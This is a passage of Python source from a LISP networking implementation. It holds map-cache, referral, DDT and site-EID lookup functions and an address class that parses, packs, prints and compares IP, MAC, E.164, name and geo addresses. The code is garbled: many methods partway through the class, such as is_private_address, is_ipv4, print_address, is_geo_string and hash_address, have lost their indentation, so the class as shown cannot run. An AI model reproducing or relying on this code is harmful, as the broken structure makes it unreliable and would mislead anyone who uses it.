        if (len(self.cache[ml].entries) == 0):
            self.cache.pop(ml)
            self.cache_sorted = sorted(self.cache)
        #endif
    #enddef
    def walk_cache(self, function, parms):
        """
        Call function(entry, parms) for every entry, least specific first.
        Stop early (returning parms) when the callback's status is False.
        """
        for ml in self.cache_sorted:
            for key in self.cache[ml].entries_sorted:
                entry = self.cache[ml].entries[key]
                status, parms = function(entry, parms)
                if (status == False): return(parms)
            #endfor
        #endfor
        return(parms)
    #enddef
    def print_cache(self):
        """Log every cache entry, for debugging."""
        lprint("Printing contents of {}: ".format(self))
        if (self.cache_size() == 0):
            lprint("  Cache is empty")
            return
        #endif
        for ml in self.cache_sorted:
            for key in self.cache[ml].entries_sorted:
                entry = self.cache[ml].entries[key]
                lprint("  Mask-length: {}, key: {}, entry: {}".format(ml, key,
                    entry))
            #endfor
        #endfor
    #enddef
#endclass
#
# Caches.
#
lisp_referral_cache = lisp_cache()   # used by lisp_referral_cache_lookup()
lisp_ddt_cache = lisp_cache()        # used by lisp_ddt_cache_lookup()
lisp_sites_by_eid = lisp_cache()     # used by lisp_site_eid_lookup()
lisp_map_cache = lisp_cache()        # used by lisp_map_cache_lookup()
lisp_db_for_lookups = lisp_cache() # Elements are class lisp_mapping()
#
# lisp_map_cache_lookup
#
# Do hierarchical lookup in the lisp_map_cache lisp_cache(). This is used
# by the ITR and RTR data-planes.
#
def lisp_map_cache_lookup(source, dest):
    """
    Hierarchical longest-match lookup of (source, dest) in lisp_map_cache,
    used by the ITR and RTR data-planes. A unicast dest returns its entry
    directly; a multicast dest does a second source lookup inside the
    group entry. Returns the map-cache entry or None.
    """
    multicast = dest.is_multicast_address()
    #
    # Look up destination in map-cache.
    #
    mc = lisp_map_cache.lookup_cache(dest, False)
    if (mc == None):
        eid_str = source.print_sg(dest) if multicast else dest.print_address()
        eid_str = green(eid_str, False)
        dprint("Lookup for EID {} not found in map-cache".format(eid_str))
        return(None)
    #endif
    #
    # Unicast lookup succeeded.
    #
    if (multicast == False):
        m = green(mc.eid.print_prefix(), False)
        dprint("Lookup for EID {} found map-cache entry {}".format( \
            green(dest.print_address(), False), m))
        return(mc)
    #endif
    #
    # If destination is multicast, then do source lookup.
    #
    mc = mc.lookup_source_cache(source, False)
    if (mc == None):
        eid_str = source.print_sg(dest)
        dprint("Lookup for EID {} not found in map-cache".format(eid_str))
        return(None)
    #endif
    #
    # Multicast lookup succeeded.
    #
    m = green(mc.print_eid_tuple(), False)
    dprint("Lookup for EID {} found map-cache entry {}".format( \
        green(source.print_sg(dest), False), m))
    return(mc)
#enddef
#
# lisp_referral_cache_lookup
#
# Do hierarchical lookup in the lisp_referral_cache lisp_cache().
#
def lisp_referral_cache_lookup(eid, group, exact):
    """
    Hierarchical lookup in lisp_referral_cache. A unicast EID (null group)
    is looked up directly; an (S,G) is a 2-stage lookup: group first, then
    the source inside the group entry's source-cache.
    """
    if (group and group.is_null()):
        return(lisp_referral_cache.lookup_cache(eid, exact))
    #endif

    #
    # Without a source there is no 2-stage lookup to do.
    #
    if (eid == None or eid.is_null()): return(None)

    #
    # Stage 1: group lookup. Stage 2: source within the group entry. On a
    # longest-match lookup the group entry itself is an acceptable answer
    # when no source entry exists.
    #
    group_entry = lisp_referral_cache.lookup_cache(group, exact)
    if (group_entry == None): return(None)

    source_entry = group_entry.lookup_source_cache(eid, exact)
    if (source_entry): return(source_entry)

    return(None if exact else group_entry)
#enddef
#
# lisp_ddt_cache_lookup
#
# Do hierarchical lookup in the lisp_ddt_cache lisp_cache().
#
def lisp_ddt_cache_lookup(eid, group, exact):
    """
    Hierarchical lookup in lisp_ddt_cache. A unicast EID (null group) is
    looked up directly; an (S,G) is a 2-stage lookup: group first, then
    the source inside the group entry's source-cache.
    """
    if (group.is_null()):
        return(lisp_ddt_cache.lookup_cache(eid, exact))
    #endif

    #
    # Without a source there is no 2-stage lookup to do.
    #
    if (eid.is_null()): return(None)

    #
    # Stage 1: group lookup. Stage 2: source within the group entry. On a
    # longest-match lookup the group entry itself is an acceptable answer
    # when no source entry exists.
    #
    group_entry = lisp_ddt_cache.lookup_cache(group, exact)
    if (group_entry == None): return(None)

    source_entry = group_entry.lookup_source_cache(eid, exact)
    if (source_entry): return(source_entry)

    return(None if exact else group_entry)
#enddef
#
# lisp_site_eid_lookup
#
# Do hierarchical lookup in the lisp_sites_by_eid lisp_cache().
#
def lisp_site_eid_lookup(eid, group, exact):
    """
    Hierarchical lookup of a registered site in lisp_sites_by_eid. Unicast
    EIDs (null group) are looked up directly; (S,G) does a 2-stage group-
    then-source lookup with an accept-more-specifics parent fallback.
    """
    if (group.is_null()):
        site_eid = lisp_sites_by_eid.lookup_cache(eid, exact)
        return(site_eid)
    #endif
    #
    # No source to do 2-stage lookup, return None.
    #
    if (eid.is_null()): return(None)
    #
    # Do 2-stage lookup, first on group and within its structure for source.
    # If we found both entries, return source entry. If we didn't find source
    # entry, then return group entry if longest match requested.
    #
    site_eid = lisp_sites_by_eid.lookup_cache(group, exact)
    if (site_eid == None): return(None)
    #
    # There is a special case we have to deal with here. If there exists a
    # (0.0.0.0/0, 224.0.0.0/4) entry that has been configured with accept-
    # more-specifics, this entry will not be returned if there is a more-
    # specific already cached. For instance, if a Map-Register was received
    # for (1.1.1.1/32, 224.1.1.1/32), it will match the (0.0.0.0/0,
    # 224.0.0.0/4) entry. But when (1.1.1.1/32, 224.1.1.1/32) is cached and
    # a Map-Register is received for (2.2.2.2/32, 224.1.1.1/32), rather than
    # matching the ams entry, it will match the more specific entry and return
    # (*, 224.1.1.1/32). Since the source lookup will be performed below and
    # not find 2.2.2.2, what is returned is 224.1.1.1/32 and not 224.0.0.0/4.
    #
    # So we will look at the returned entry and if a source is not found, we
    # will check to see if the parent of the 224.1.1.1/32 matches the group
    # we are looking up. This, of course, is only done for longest match
    # lookups.
    #
    seid = site_eid.lookup_source_cache(eid, exact)
    if (seid): return(seid)
    if (exact):
        site_eid = None
    else:
        parent = site_eid.parent_for_more_specifics
        if (parent and parent.accept_more_specifics):
            if (group.is_more_specific(parent.group)): site_eid = parent
        #endif
    #endif
    return(site_eid)
#enddef
#
# LISP Address encodings. Both in AFI formats and LCAF formats.
#
# Here is an EID encoded in:
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
# There is a python particularity with shifting greater than 120 bits to the
# left. If the high-order bit hits bit 127, then it shifts it another 8 bits.
# This causes IPv6 addresses to lose their high-order byte. So note the check
# for shift >= 120 below.
#
class lisp_address():
    def __init__(self, afi, addr_str, mask_len, iid):
        # afi: LISP_AFI_* value (negative values are internal sentinels).
        # addr_str: optional textual address, parsed via store_address().
        # mask_len: prefix length in bits.
        # iid: instance-id this address/prefix belongs to.
        self.afi = afi
        self.mask_len = mask_len
        self.instance_id = iid
        self.iid_list = []
        self.address = 0
        if (addr_str != ""): self.store_address(addr_str)
    #enddef
    def copy_address(self, addr):
        """Copy all address fields from 'addr' into self (no-op on None)."""
        if (addr == None): return
        self.afi = addr.afi
        self.address = addr.address
        self.mask_len = addr.mask_len
        self.instance_id = addr.instance_id
        # NOTE(review): this aliases addr's list rather than copying it, so
        # later mutations are shared — confirm callers never mutate iid_list.
        self.iid_list = addr.iid_list
    #enddef
    def make_default_route(self, addr):
        """Make self the 0-length default prefix in addr's AFI and IID."""
        self.afi = addr.afi
        self.instance_id = addr.instance_id
        self.mask_len = 0
        self.address = 0
    #enddef
    def make_default_multicast_route(self, addr):
        """
        Make self the default multicast prefix for addr's AFI and IID:
        224.0.0.0/4, ff00::/8, or ffff-ffff-ffff/48.
        """
        self.afi = addr.afi
        self.instance_id = addr.instance_id
        if (self.afi == LISP_AFI_IPV4):
            self.address = 0xe0000000   # 224.0.0.0
            self.mask_len = 4
        #endif
        if (self.afi == LISP_AFI_IPV6):
            self.address = 0xff << 120  # ff00::
            self.mask_len = 8
        #endif
        if (self.afi == LISP_AFI_MAC):
            self.address = 0xffffffffffff
            self.mask_len = 48
        #endif
    #enddef
    def not_set(self):
        """True when no address-family has been assigned yet."""
        return(self.afi == LISP_AFI_NONE)
    #enddef
def is_private_address(self):
if (self.is_ipv4() == False): return(False)
addr = self.address
if (((addr & 0xff000000) >> 24) == 10): return(True)
if (((addr & 0xff000000) >> 24) == 172):
byte2 = (addr & 0x00ff0000) >> 16
if (byte2 >= 16 and byte2 <= 31): return(True)
#endif
if (((addr & 0xffff0000) >> 16) == 0xc0a8): return(True)
return(False)
#enddef
    def is_multicast_address(self):
        """True for an IPv4, IPv6, or MAC multicast address."""
        if (self.is_ipv4()): return(self.is_ipv4_multicast())
        if (self.is_ipv6()): return(self.is_ipv6_multicast())
        if (self.is_mac()): return(self.is_mac_multicast())
        return(False)
    #enddef
    def host_mask_len(self):
        """Return the mask-length in bits of a host address for this AFI."""
        if (self.afi == LISP_AFI_IPV4): return(LISP_IPV4_HOST_MASK_LEN)
        if (self.afi == LISP_AFI_IPV6): return(LISP_IPV6_HOST_MASK_LEN)
        if (self.afi == LISP_AFI_MAC): return(LISP_MAC_HOST_MASK_LEN)
        if (self.afi == LISP_AFI_E164): return(LISP_E164_HOST_MASK_LEN)
        if (self.afi == LISP_AFI_NAME): return(len(self.address) * 8)
        if (self.afi == LISP_AFI_GEO_COORD):
            return(len(self.address.print_geo()) * 8)
        #endif
        return(0)
    #enddef
    def is_iana_eid(self):
        """True for IPv6 EIDs inside the 2001:5::/32 block."""
        if (self.is_ipv6() == False): return(False)
        addr = self.address >> 96
        return(addr == 0x20010005)
    #enddef
    def addr_length(self):
        """Return the encoded length in bytes of this AFI's address
        (0 for LCAF or unknown AFIs)."""
        if (self.afi == LISP_AFI_IPV4): return(4)
        if (self.afi == LISP_AFI_IPV6): return(16)
        if (self.afi == LISP_AFI_MAC): return(6)
        if (self.afi == LISP_AFI_E164): return(8)
        if (self.afi == LISP_AFI_LCAF): return(0)
        # Distinguished-names count their null terminator.
        if (self.afi == LISP_AFI_NAME): return(len(self.address) + 1)
        if (self.afi == LISP_AFI_IID_RANGE): return(4)
        if (self.afi == LISP_AFI_GEO_COORD):
            return(len(self.address.print_geo()))
        #endif
        return(0)
    #enddef
    def afi_to_version(self):
        """Return IP version 4 or 6, or 0 for non-IP AFIs."""
        if (self.afi == LISP_AFI_IPV4): return(4)
        if (self.afi == LISP_AFI_IPV6): return(6)
        return(0)
    #enddef
    def packet_format(self):
        """Return the struct format string used to pack this AFI's address
        ("" when the AFI has no fixed binary encoding)."""
        #
        # Note that "I" is used to produce 4 bytes because when "L" is used,
        # it was producing 8 bytes in struct.pack().
        #
        if (self.afi == LISP_AFI_IPV4): return("I")
        if (self.afi == LISP_AFI_IPV6): return("QQ")
        if (self.afi == LISP_AFI_MAC): return("HHH")
        if (self.afi == LISP_AFI_E164): return("II")
        if (self.afi == LISP_AFI_LCAF): return("I")
        return("")
    #enddef
    def pack_address(self):
        """
        Return self.address packed for the wire in network byte-order.
        Distinguished-names are null-terminated; unknown AFIs return "".
        """
        packet_format = self.packet_format()
        packet = ""
        if (self.is_ipv4()):
            packet = struct.pack(packet_format, socket.htonl(self.address))
        elif (self.is_ipv6()):
            # Two 64-bit halves, each byte-swapped to network order.
            addr1 = byte_swap_64(self.address >> 64)
            addr2 = byte_swap_64(self.address & 0xffffffffffffffff)
            packet = struct.pack(packet_format, addr1, addr2)
        elif (self.is_mac()):
            # MAC packed as three 16-bit shorts.
            addr = self.address
            addr1 = (addr >> 32) & 0xffff
            addr2 = (addr >> 16) & 0xffff
            addr3 = addr & 0xffff
            packet = struct.pack(packet_format, addr1, addr2, addr3)
        elif (self.is_e164()):
            addr = self.address
            addr1 = (addr >> 32) & 0xffffffff
            addr2 = (addr & 0xffffffff)
            packet = struct.pack(packet_format, addr1, addr2)
        elif (self.is_dist_name()):
            packet += self.address + "\0"
        #endif
        return(packet)
    #enddef
    def unpack_address(self, packet):
        """
        Decode an address of family self.afi from the head of 'packet'.
        Returns the remaining packet, or None when it is too short.
        """
        packet_format = self.packet_format()
        format_size = struct.calcsize(packet_format)
        if (len(packet) < format_size): return(None)
        addr = struct.unpack(packet_format, packet[:format_size])
        if (self.is_ipv4()):
            self.address = socket.ntohl(addr[0])
        elif (self.is_ipv6()):
            #
            # Sigh, we have a high-order byte with zero-fill issue when
            # parsing a binary IPv6 address from a packet. If we have an
            # address that starts with fe::, then addr[0] is one byte in
            # length and byte-swapping is not necessary (or we would make
            # the high-order 16 bits 00fe). Sigh.
            #
            if (addr[0] <= 0xffff and (addr[0] & 0xff) == 0):
                high = (addr[0] << 48) << 64
            else:
                high = byte_swap_64(addr[0]) << 64
            #endif
            low = byte_swap_64(addr[1])
            self.address = high | low
        elif (self.is_mac()):
            short1 = addr[0]
            short2 = addr[1]
            short3 = addr[2]
            self.address = (short1 << 32) + (short2 << 16) + short3
        elif (self.is_e164()):
            self.address = (addr[0] << 32) + addr[1]
        elif (self.is_dist_name()):
            # Distinguished-name decode consumes its own bytes, so do not
            # advance by format_size below.
            packet, self.address = lisp_decode_dist_name(packet)
            self.mask_len = len(self.address) * 8
            format_size = 0
        #endif
        packet = packet[format_size::]
        return(packet)
    #enddef
def is_ipv4(self):
return(True if (self.afi == LISP_AFI_IPV4) else False)
#enddef
    def is_ipv4_link_local(self):
        """True for IPv4 link-local addresses 169.254.0.0/16 (0xa9fe)."""
        if (self.is_ipv4() == False): return(False)
        return(((self.address >> 16) & 0xffff) == 0xa9fe)
    #enddef
    def is_ipv4_loopback(self):
        """True only for exactly 127.0.0.1."""
        if (self.is_ipv4() == False): return(False)
        return(self.address == 0x7f000001)
    #enddef
    def is_ipv4_multicast(self):
        """True for 224.0.0.0/4 (high-order nibble 0xe)."""
        if (self.is_ipv4() == False): return(False)
        return(((self.address >> 24) & 0xf0) == 0xe0)
    #enddef
def is_ipv4_string(self, addr_str):
return(addr_str.find(".") != -1)
#enddef
def is_ipv6(self):
return(True if (self.afi == LISP_AFI_IPV6) else False)
#enddef
    def is_ipv6_link_local(self):
        """True when the top 16 bits are 0xfe80 (link-local)."""
        if (self.is_ipv6() == False): return(False)
        return(((self.address >> 112) & 0xffff) == 0xfe80)
    #enddef
def is_ipv6_string_link_local(self, addr_str):
return(addr_str.find("fe80::") != -1)
#enddef
    def is_ipv6_loopback(self):
        """True for the IPv6 loopback address ::1."""
        if (self.is_ipv6() == False): return(False)
        return(self.address == 1)
    #enddef
    def is_ipv6_multicast(self):
        """True for ff00::/8 multicast addresses."""
        if (self.is_ipv6() == False): return(False)
        return(((self.address >> 120) & 0xff) == 0xff)
    #enddef
def is_ipv6_string(self, addr_str):
return(addr_str.find(":") != -1)
#enddef
def is_mac(self):
return(True if (self.afi == LISP_AFI_MAC) else False)
#enddef
    def is_mac_multicast(self):
        """True when the group bit (low-order bit of first octet) is set."""
        if (self.is_mac() == False): return(False)
        return((self.address & 0x010000000000) != 0)
    #enddef
    def is_mac_broadcast(self):
        """True for the all-ones MAC address ffff-ffff-ffff."""
        if (self.is_mac() == False): return(False)
        return(self.address == 0xffffffffffff)
    #enddef
def is_mac_string(self, addr_str):
return(len(addr_str) == 15 and addr_str.find("-") != -1)
#enddef
    def is_link_local_multicast(self):
        """True for link-local scoped multicast (IPv4 224.0.0.x, IPv6
        ff02::/16)."""
        if (self.is_ipv4()):
            # NOTE(review): mask 0xe0ffff00 pins only the top 3 bits of the
            # first octet, so e.g. 225.0.0.x also matches — confirm callers
            # guarantee is_multicast_address() first.
            return((0xe0ffff00 & self.address) == 0xe0000000)
        #endif
        if (self.is_ipv6()):
            return((self.address >> 112) & 0xffff == 0xff02)
        #endif
        return(False)
    #enddef
def is_null(self):
return(True if (self.afi == LISP_AFI_NONE) else False)
#enddef
def is_ultimate_root(self):
return(True if self.afi == LISP_AFI_ULTIMATE_ROOT else False)
#enddef
def is_iid_range(self):
return(True if self.afi == LISP_AFI_IID_RANGE else False)
#enddef
def is_e164(self):
return(True if (self.afi == LISP_AFI_E164) else False)
#enddef
def is_dist_name(self):
return(True if (self.afi == LISP_AFI_NAME) else False)
#enddef
def is_geo_prefix(self):
return(True if (self.afi == LISP_AFI_GEO_COORD) else False)
#enddef
def is_binary(self):
if (self.is_dist_name()): return(False)
if (self.is_geo_prefix()): return(False)
return(True)
#enddef
    def store_address(self, addr_str):
        """
        Parse textual address 'addr_str' (optionally prefixed with a
        bracketed "[<iid>]") into self.address, inferring the AFI when
        unset and setting mask_len to the AFI's host length.
        """
        if (self.afi == LISP_AFI_NONE): self.string_to_afi(addr_str)
        #
        # Parse instance-id.
        #
        i = addr_str.find("[")
        j = addr_str.find("]")
        if (i != -1 and j != -1):
            self.instance_id = int(addr_str[i+1:j])
            addr_str = addr_str[j+1::]
            if (self.is_dist_name() == False):
                addr_str = addr_str.replace(" ", "")
            #endif
        #endif
        #
        # Parse AFI based address.
        #
        if (self.is_ipv4()):
            octet = addr_str.split(".")
            value = int(octet[0]) << 24
            value += int(octet[1]) << 16
            value += int(octet[2]) << 8
            value += int(octet[3])
            self.address = value
        elif (self.is_ipv6()):
            #
            # There will be a common IPv6 address input mistake that will
            # occur. The address ff::/8 (or an address ff::1) is actually
            # encoded as 0x00ff as the high-order 16-bits. The correct way to
            # specify the prefix is ff00::/8 but one would wonder why the
            # lower order 0x00 bits are needed if a /8 is used. So to
            # summarize:
            #
            # Entering ff::/8 will give you the 0::/8 prefix.
            # Entering ff00::/8 is not the same as ff00::/16.
            #
            # Allow user to specify ff::/8 which allows for placing the the
            # byte in the high-order byte of the 128-bit quantity. Check
            # for double-colon in the input string to detect the single byte
            # and then below byte-swap the first 2-bytes.
            #
            odd_byte = (addr_str[2:4] == "::")
            try:
                addr_str = socket.inet_pton(socket.AF_INET6, addr_str)
            except:
                # Unparseable input falls back to the all-zeros address.
                addr_str = socket.inet_pton(socket.AF_INET6, "0::0")
            #endtry
            addr_str = binascii.hexlify(addr_str)
            if (odd_byte):
                addr_str = addr_str[2:4] + addr_str[0:2] + addr_str[4::]
            #endif
            self.address = int(addr_str, 16)
        elif (self.is_geo_prefix()):
            geo = lisp_geo(None)
            geo.name = "geo-prefix-{}".format(geo)
            geo.parse_geo_string(addr_str)
            self.address = geo
        elif (self.is_mac()):
            addr_str = addr_str.replace("-", "")
            value = int(addr_str, 16)
            self.address = value
        elif (self.is_e164()):
            # Strip the leading "+"; digits are left-justified by a nibble.
            addr_str = addr_str[1::]
            value = int(addr_str, 16)
            self.address = value << 4
        elif (self.is_dist_name()):
            self.address = addr_str.replace("'", "")
        #endif
        self.mask_len = self.host_mask_len()
    #enddef
    def store_prefix(self, prefix_str):
        """
        Parse an EID-prefix string: "<addr>/<mask-len>", a geo-string, or
        a quoted distinguished-name (mask-len derived from its length).
        """
        if (self.is_geo_string(prefix_str)):
            index = prefix_str.find("]")
            mask_len = len(prefix_str[index+1::]) * 8
        elif (prefix_str.find("/") != -1):
            prefix_str, mask_len = prefix_str.split("/")
        else:
            left = prefix_str.find("'")
            if (left == -1): return
            right = prefix_str.find("'", left+1)
            if (right == -1): return
            mask_len = len(prefix_str[left+1:right]) * 8
        #endif
        self.string_to_afi(prefix_str)
        self.store_address(prefix_str)
        self.mask_len = int(mask_len)
    #enddef
    def zero_host_bits(self):
        """Clear all address bits below the prefix mask-length."""
        if (self.mask_len < 0): return
        mask = (2 ** self.mask_len) - 1
        shift = self.addr_length() * 8 - self.mask_len
        mask <<= shift
        self.address &= mask
    #enddef
def is_geo_string(self, addr_str):
index = addr_str.find("]")
if (index != -1): addr_str = addr_str[index+1::]
geo = addr_str.split("/")
if (len(geo) == 2):
if (geo[1].isdigit() == False): return(False)
#endif
geo = geo[0]
geo = geo.split("-")
geo_len = len(geo)
if (geo_len < 8 or geo_len > 9): return(False)
for num in range(0, geo_len):
if (num == 3):
if (geo[num] in ["N", "S"]): continue
return(False)
#enif
if (num == 7):
if (geo[num] in ["W", "E"]): continue
return(False)
#endif
if (geo[num].isdigit() == False): return(False)
#endfor
return(True)
#enddef
    def string_to_afi(self, addr_str):
        """
        Set self.afi from the syntax of 'addr_str': two quotes => name,
        ":" => IPv6, "." => IPv4, "+" => E.164, geo-string, "-" => MAC,
        otherwise none.
        """
        if (addr_str.count("'") == 2):
            self.afi = LISP_AFI_NAME
            return
        #endif
        if (addr_str.find(":") != -1): self.afi = LISP_AFI_IPV6
        elif (addr_str.find(".") != -1): self.afi = LISP_AFI_IPV4
        elif (addr_str.find("+") != -1): self.afi = LISP_AFI_E164
        elif (self.is_geo_string(addr_str)): self.afi = LISP_AFI_GEO_COORD
        elif (addr_str.find("-") != -1): self.afi = LISP_AFI_MAC
        else: self.afi = LISP_AFI_NONE
    #enddef
def print_address(self):
addr = self.print_address_no_iid()
iid = "[" + str(self.instance_id)
for i in self.iid_list: iid += "," + str(i)
iid += "]"
addr = "{}{}".format(iid, addr)
return(addr)
#enddef
    def print_address_no_iid(self):
        """Return this address as text without the bracketed instance-id."""
        if (self.is_ipv4()):
            addr = self.address
            value1 = addr >> 24
            value2 = (addr >> 16) & 0xff
            value3 = (addr >> 8) & 0xff
            value4 = addr & 0xff
            return("{}.{}.{}.{}".format(value1, value2, value3, value4))
        elif (self.is_ipv6()):
            addr_str = lisp_hex_string(self.address).zfill(32)
            addr_str = binascii.unhexlify(addr_str)
            addr_str = socket.inet_ntop(socket.AF_INET6, addr_str)
            return("{}".format(addr_str))
        elif (self.is_geo_prefix()):
            return("{}".format(self.address.print_geo()))
        elif (self.is_mac()):
            addr_str = lisp_hex_string(self.address).zfill(12)
            addr_str = "{}-{}-{}".format(addr_str[0:4], addr_str[4:8],
                addr_str[8:12])
            return("{}".format(addr_str))
        elif (self.is_e164()):
            addr_str = lisp_hex_string(self.address).zfill(15)
            return("+{}".format(addr_str))
        elif (self.is_dist_name()):
            return("'{}'".format(self.address))
        elif (self.is_null()):
            return("no-address")
        #endif
        return("unknown-afi:{}".format(self.afi))
    #enddef
    def print_prefix(self):
        """
        Return the printable EID-prefix: "[*]" for the ultimate root,
        "[lo-hi]" for instance-id ranges, otherwise "[iid]addr/mask-len".
        """
        if (self.is_ultimate_root()): return("[*]")
        if (self.is_iid_range()):
            if (self.mask_len == 32): return("[{}]".format(self.instance_id))
            upper = self.instance_id + (2**(32 - self.mask_len) - 1)
            return("[{}-{}]".format(self.instance_id, upper))
        #endif
        addr = self.print_address()
        if (self.is_dist_name()): return(addr)
        if (self.is_geo_prefix()): return(addr)
        index = addr.find("no-address")
        if (index == -1):
            addr = "{}/{}".format(addr, str(self.mask_len))
        else:
            # AFI-less prefix: keep only the leading "[iid]" portion.
            addr = addr[0:index]
        #endif
        return(addr)
    #enddef
    def print_prefix_no_iid(self):
        """Return "addr/mask-len" without "[iid]"; names/geo print bare."""
        addr = self.print_address_no_iid()
        if (self.is_dist_name()): return(addr)
        if (self.is_geo_prefix()): return(addr)
        return("{}/{}".format(addr, str(self.mask_len)))
    #enddef
    def print_prefix_url(self):
        """Return URL-safe form "<iid>-<addr>-<mask-len>" ("0--0" for the
        ultimate root)."""
        if (self.is_ultimate_root()): return("0--0")
        addr = self.print_address()
        index = addr.find("]")
        if (index != -1): addr = addr[index+1::]
        if (self.is_geo_prefix()):
            addr = addr.replace("/", "-")
            return("{}-{}".format(self.instance_id, addr))
        #endif
        return("{}-{}-{}".format(self.instance_id, addr, self.mask_len))
    #enddef
    def print_sg(self, g):
        """Return the (S,G) string "[iid](source, group)" for self and g."""
        s = self.print_prefix()
        si = s.find("]") + 1
        g = g.print_prefix()
        gi = g.find("]") + 1
        sg_str = "[{}]({}, {})".format(self.instance_id, s[si::], g[gi::])
        return(sg_str)
    #enddef
def hash_address(self, addr):
addr1 = self.address
addr2 = addr.address
if (self.is_geo_prefix()): addr1 = self.address.print_geo()
if (addr.is_geo_prefix()): addr2 = addr.address.print_geo()
if (type(addr1) == str):
addr1 = int(binascii.hexlify(addr1[0:1]))
#endif
if (type(addr2) == str):
addr2 = int(binascii.hexlify(addr2[0:1]))
#endif
return(addr1 ^ addr2)
#enddef
#
# Is self more specific or equal to the prefix supplied in variable
# 'prefix'. Return True if so.
#
    def is_more_specific(self, prefix):
        """
        Return True when self is equal to or more specific than 'prefix'.
        """
        if (prefix.afi == LISP_AFI_ULTIMATE_ROOT): return(True)
        mask_len = prefix.mask_len
        if (prefix.afi == LISP_AFI_IID_RANGE):
            size = 2**(32 - mask_len)
            lower = prefix.instance_id
            upper = lower + size
            return(self.instance_id in range(lower, upper))
        #endif
        if (self.instance_id != prefix.instance_id): return(False)
        if (self.afi != prefix.afi):
            # An AFI-less prefix covers any AFI within its instance-id.
            if (prefix.afi != LISP_AFI_NONE): return(False)
        #endif
        #
        # Handle string addresses like distinguished names and geo-prefixes.
        #
        if (self.is_binary() == False):
            if (prefix.afi == LISP_AFI_NONE): return(True)
            if (type(self.address) != type(prefix.address)): return(False)
            addr = self.address
            paddr = prefix.address
            if (self.is_geo_prefix()):
                addr = self.address.print_geo()
                paddr = prefix.address.print_geo()
            #endif
            # "More specific" for strings means prefix is a leading match.
            if (len(addr) < len(paddr)): return(False)
            return(addr.find(paddr) == 0)
        #endif
        #
        # Handle numeric addresses.
        #
        if (self.mask_len < mask_len): return(False)
        shift = (prefix.addr_length() * 8) - mask_len
        mask = (2**mask_len - 1) << shift
        return((self.address & mask) == prefix.address)
    #enddef
    def mask_address(self, mask_len):
        """Zero all address bits below 'mask_len'."""
        shift = (self.addr_length() * 8) - mask_len
        mask = (2**mask_len - 1) << shift
        self.address &= mask
    #enddef
    def is_exact_match(self, prefix):
        """True when self and 'prefix' print as the identical EID-prefix
        (instance-ids must match first)."""
        if (self.instance_id != prefix.instance_id): return(False)
        p1 = self.print_prefix()
        p2 = prefix.print_prefix() if prefix else ""
        return(p1 == p2)
    #enddef
    def is_local(self):
        """True when this IP address equals one of our own RLOCs
        (lisp_myrlocs[0] for IPv4, lisp_myrlocs[1] for IPv6)."""
        if (self.is_ipv4()):
            local = lisp_myrlocs[0]
            if (local == None): return(False)
            local = local.print_address_no_iid()
            return(self.print_address_no_iid() == local)
        #endif
        if (self.is_ipv6()):
            local = lisp_myrlocs[1]
            if (local == None): return(False)
            local = local.print_address_no_iid()
            return(self.print_address_no_iid() == local)
        #endif
        return(False)
    #enddef
    def store_iid_range(self, iid, mask_len):
        """
        Make self an instance-id range starting at 'iid' covering
        2**(32 - mask_len) IIDs; (0, 0) becomes the ultimate root.
        """
        if (self.afi == LISP_AFI_NONE):
            if (iid == 0 and mask_len == 0): self.afi = LISP_AFI_ULTIMATE_ROOT
            else: self.afi = LISP_AFI_IID_RANGE
        #endif
        self.instance_id = iid
        self.mask_len = mask_len
    #enddef
    def lcaf_length(self, lcaf_type):
        """
        Return the LCAF 'Length' field value for this address in the given
        LCAF type: 2-byte AFI + address + the type's fixed overhead.
        """
        length = self.addr_length() + 2
        if (lcaf_type == LISP_LCAF_AFI_LIST_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_INSTANCE_ID_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_ASN_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_APP_DATA_TYPE): length += 8
        if (lcaf_type == LISP_LCAF_GEO_COORD_TYPE): length += 12
        if (lcaf_type == LISP_LCAF_OPAQUE_TYPE): length += 0
        if (lcaf_type == LISP_LCAF_NAT_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_NONCE_LOC_TYPE): length += 4
        # Multicast-info carries both an (S,G) pair, hence doubled.
        if (lcaf_type == LISP_LCAF_MCAST_INFO_TYPE): length = length * 2 + 8
        if (lcaf_type == LISP_LCAF_ELP_TYPE): length += 0
        if (lcaf_type == LISP_LCAF_SECURITY_TYPE): length += 6
        if (lcaf_type == LISP_LCAF_SOURCE_DEST_TYPE): length += 4
        if (lcaf_type == LISP_LCAF_RLE_TYPE): length += 4
        return(length)
    #enddef
#
# Instance ID LISP Canonical Address Format:
#
# 0 1 2 3
# 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1 2 3 4 5 6 7 8 9 0 1
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = 16387 | Rsvd1 | Flags |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Type = 2 | IID mask-len | 4 + n |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | Instance ID |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
# | AFI = x | Address ... |
# +-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+-+
#
